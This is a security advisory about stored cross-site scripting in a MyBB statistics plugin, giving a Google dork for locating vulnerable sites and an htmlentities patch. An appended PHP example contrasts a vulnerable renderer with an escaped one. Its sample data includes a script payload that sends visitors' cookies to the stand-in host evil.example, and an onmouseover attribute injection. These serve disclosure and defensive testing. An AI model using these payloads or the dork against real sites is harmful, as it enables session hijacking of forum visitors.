+--------------------------+-------------------------------+
|                    3 Ethical Hackers . com               |
+--------------------------+-------------------------------+
irc.smashthestack.org #3ethical

Affected software: Advanced Stats On Index plugin for the MyBB PHP bulletin board
Versions: <= 3.1
Link: http://mods.mybb.com/view/advanced-stats-on-index-portal-for-mybb-1-4-x
Google Dork: inurl:/asoi.php?asoi= (returns ~200 hits)

------------------------------POC/Info--------------------------------------

The affected plugin fails to sanitize user-controlled input before rendering
it on the page (stored cross-site scripting). Affected fields are:

  - Usernames (the user-creation script in MyBB 1.4.13 blocks special
    characters in the name, so this vector is mitigated on that version)
  - Events
  - Thread topics

These fields are displayed on the forum home page where the plugin's output
appears. When a thread subject or event containing a malicious payload is
loaded into the front page, attacker-supplied JavaScript executes in the
context of the page, and therefore in the session of every visitor, and can
do anything it wants to the rest of the page.

----------------------------------------------------------------------------
------------------------------Patch-----------------------------------------

Change

OLD:
    $lines .= $icon."".$thread['subject']." (".$lang->asoi_by." ";

to

Patched:
    $lines .= $icon."".htmlentities($thread['subject'])." (".$lang->asoi_by." ";

diff: wrap the value in htmlentities(...), i.e. .htmlentities($thread['subject']).

Apply the same change to every instance of a thread subject, event name, or
any other user-editable field the plugin echoes, so that HTML metacharacters
are encoded before output. Note that htmlentities() with its pre-PHP-8.1
default flags leaves single quotes unencoded; pass ENT_QUOTES and the page
charset (or use MyBB's own htmlspecialchars_uni() helper) so that values
landing inside single-quoted attributes are covered as well.

----------------------------------------------------------------------------
--------------------------Credits-------------------------------------------

3ethicalhackers.com >> we don't need to post our handles kthxbai

::::::::::::::::::::::::::Greetz:::::::::::::::::::::::::::::::::::::::::::::

gr33tz to SMP (irc.smashthestack.org #smpctf)
Mason/d3p0rt

JOIN US IN IRC: IRC.SMASHTHESTACK.ORG #3ETHICAL
FORUMS @ 3ETHICALHACKERS.COM

>>EOF
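The following is an added example, not code from the plugin or from the advisory authors. It models the index-page rendering loop the Patch section refers to: one renderer reproduces the unescaped concatenation from the OLD line, the other encodes every user-controlled value at output time. The $threads rows, the $icon markup and the $lang->asoi_by string are constructed stand-ins for what the plugin reads from the MyBB database and language files; the helper name esc() is an assumption made for this example.

```php
<?php
// Added example (not the plugin's code). Models the plugin's thread-listing
// loop with constructed data so the vulnerable and hardened paths can be
// compared side by side.

// Constructed sample rows standing in for database results. The second row
// carries a classic stored-XSS payload in the subject; the third carries an
// attribute-context payload that only works if single quotes are left alone.
function sample_threads(): array
{
    return [
        ['subject' => 'Welcome to the forum', 'username' => 'admin'],
        ['subject' => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
         'username' => 'mallory'],
        ['subject' => "x' onmouseover='alert(1)", 'username' => 'mallory'],
    ];
}

// Assumed language object; the real plugin reads $lang from MyBB's language files.
function sample_lang(): stdClass
{
    $lang = new stdClass();
    $lang->asoi_by = 'by';
    return $lang;
}

// Vulnerable renderer: mirrors the OLD line from the advisory. Whatever the
// poster typed as a subject is concatenated straight into the HTML.
function render_vulnerable(array $threads, stdClass $lang): string
{
    $icon  = '<img src="images/thread.gif" alt="">';   // assumed icon markup
    $lines = '';
    foreach ($threads as $thread) {
        $lines .= $icon . "" . $thread['subject'] . " (" . $lang->asoi_by . " "
                . $thread['username'] . ")<br>\n";
    }
    return $lines;
}

// Output-encoding helper (name assumed for this example). ENT_QUOTES encodes
// both ' and ", which the pre-PHP-8.1 default flags of htmlentities() and
// htmlspecialchars() do not do for '; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string; the charset must match the page's.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened renderer: same loop, every user-controlled value passes through esc()
// immediately before it is concatenated into the HTML output.
function render_patched(array $threads, stdClass $lang): string
{
    $icon  = '<img src="images/thread.gif" alt="">';
    $lines = '';
    foreach ($threads as $thread) {
        $lines .= $icon . "" . esc($thread['subject']) . " (" . $lang->asoi_by . " "
                . esc($thread['username']) . ")<br>\n";
    }
    return $lines;
}

// Self-check: the vulnerable output carries the raw <script> tag and the raw
// single quote; the patched output carries neither, only their encoded forms.
function self_check(): bool
{
    $vuln    = render_vulnerable(sample_threads(), sample_lang());
    $patched = render_patched(sample_threads(), sample_lang());

    return strpos($vuln, '<script>') !== false
        && strpos($vuln, "x' onmouseover") !== false
        && strpos($patched, '<script>') === false
        && strpos($patched, '&lt;script&gt;') !== false
        && strpos($patched, "x' onmouseover") === false
        && strpos($patched, 'x&#039; onmouseover') !== false;
}

echo self_check() ? "patched renderer encodes all payloads\n"
                  : "FAIL: payload survived encoding\n";
echo render_patched(sample_threads(), sample_lang());
```

Run it with `php example.php`. The design point is that encoding happens at the output site, per value, rather than by stripping characters at input time: the subject stays intact in the database, and any other template that later echoes it must apply the same encoding for its own context (HTML body here; attribute, URL and JavaScript contexts need their own encoders).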